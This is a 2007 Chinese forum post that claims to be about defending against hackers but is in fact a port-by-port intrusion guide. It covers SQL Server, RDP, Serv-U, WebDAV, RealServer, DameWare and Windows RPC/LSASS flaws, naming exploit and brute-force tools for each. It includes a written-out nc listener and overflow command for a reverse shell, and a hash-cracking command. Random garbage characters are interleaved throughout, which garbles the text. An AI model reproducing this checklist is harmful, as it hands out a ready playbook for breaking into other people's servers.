下沙论坛

 找回密码
 注册论坛(EC通行证)

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
查看: 1851|回复: 1
打印 上一主题 下一主题

入侵方法以及工具防范

[复制链接]
头像被屏蔽

该用户从未签到

跳转到指定楼层
1
发表于 2007-12-17 01:04:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。
0 ~+ W0 B# U& U# W  
& m* s* M6 L! Z) p! S: g
+ ]! V4 p  c1 c  1. 1433端口入侵
- Y# G% A6 e; S9 y9 `
4 o$ E/ P7 t: w5 L, ^  scanport.exe 查有1433的机器 # B: S8 o4 _1 [& u
9 S6 s2 ?0 ]1 w  F
  SQLScanPass.exe 进行字典暴破(字典是关键) 2 U( Y1 y, D$ W4 C' U' T2 O3 m0 F

) \5 K7 j5 v6 B# @! y  最后 SQLTools.exe入侵 ) i- l9 O: j; Q

* O$ T) h5 m  `& s  m; w  =============================
1 q& B" E. x+ u) `, X! P; c- H; I) _9 D
  对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 9 N9 W. N+ c$ z
/ c4 f/ l# a* N6 p: f7 @
  nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
+ i& E, _& o; I. _3 n' N& @
' o" U; [6 S, C+ i  (以上反向的,测试成功) , A5 S; X6 Y' d" }; A

9 e# T9 ~& M7 H8 C. ?# v+ w$ M% L  sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
, ?2 O, d  S$ Y/ H4 u  
  [8 U7 n0 X: t% R/ I. t$ V  2. 4899端口入侵
$ T' e6 K8 q- `# f
6 U7 k8 U# Y' M* Z7 K# y  用4899过滤器.exe,扫描空口令的机器      `6 j/ e* I. `
' M6 ^( g' b, \& O: X
  3. 3899的入侵
) \4 e6 P6 [# p3 l8 Y% x2 u! q
2 m/ D! O, e( E( D  对很早的机器,可以试试3389的溢出(win3389ex.exe) * H% S. y8 z0 V1 x' ^, c

' z1 i, I  a8 P& B' [% b" F' s$ Q  对2000的机器,可以试试字典暴破。(tscrack.exe)
7 X5 [5 f) |' t' c# O& j$ U! s   - [# o0 }. l! g2 c, S
  4. 80入侵 6 v; H0 W1 z& s; [2 a

6 a* b* j" A. |4 ], I  对sp3以前的机器,可以用webdav入侵;
. O3 Q, m; ]9 H' N3 q5 n; X/ r+ ]: f' N8 q, p: e8 P
  对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
- i7 i7 ?: e' @6 ?( v6 Y) `
( l# v7 K7 |% t8 h  可以利用SQL进行注入。(小榕的注入软件)。 " b! s  a9 n* h5 F
: P/ Z/ F3 w. l
  5. serv-u入侵(21端口)
, _* p9 E7 ?' k- g1 ^: T0 p
  M' E0 X( ~! t1 |1 z- Y: G( b3 ]  对5. 004及以下系统,可用溢出入侵。(serv5004.exe) $ t; L( {7 s1 J* e

# k7 a, J1 g4 L) \$ t  对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 3 |% P4 g2 J  W$ T6 i6 s
4 ?; Y$ F0 o+ u+ F2 T% S
  ====================================== 6 M& n* W6 y5 R
* E3 q+ L* v" D0 R$ |
  对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) + }" a. E+ }) v9 u; Z

2 J, a) @% s3 W0 `; m  输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
: }: Y3 y% {) b7 y' X, N% f  
+ c# |3 I" V% k& \0 L( T6 h' ]; u" a  6. 554端口
# W" V$ U3 W+ M7 ~/ J0 G* @% A% ]4 p/ Y$ P- k- T; f0 n% a
  用real554.exe入侵。 7 L& ~7 d0 z, V! _* W- J
   5 @; B6 `6 h, Z9 r% h) Q
  7. 6129端口
0 |1 Y  |/ g/ h6 }1 c0 C6 M: e; J6 c  u0 K- l  [4 z) \4 Y" t: K
  用DameWare6129.exe入侵。
) Y) f* S8 T2 V: ?( B3 e: o% D& s1 g, }
  8. 系统漏洞 & Q! `7 o) o; u9 r
* r, v, R3 D/ @
  利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
9 v# H" Y/ d6 W7 V- s! q8 `' p3 r" y/ U% B4 a# q5 S
  进行溢出入侵。 # u0 p2 U' Q  C* D$ g: v% I( O

- e$ e6 w5 b3 _3 E" y  9. 3127等端口
% e) C; ~* m# C! E" k1 @- c7 Z
7 ?& i/ v6 ]' ^5 o  可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
$ t  @) u; j3 S3 i5 j" a; N# Y# u- R
  10. 其他入侵 $ o( R3 i( ?- H' @9 {4 k# [. b6 u" W5 b: ~
2 Q$ G3 C: M1 v3 B" [0 w
  利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
- l2 @3 c1 `! T, o  @
. _' C1 a$ }7 U# l; S
转自杜松论坛:http://www.juniperbbs.net/index.php
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享 顶 踩

该用户从未签到

2
发表于 2007-12-17 22:31:45 | 只看该作者
回复 支持 反对

使用道具 举报

本版积分规则

关闭

下沙大学生网推荐上一条 /1 下一条

快速回复 返回顶部 返回列表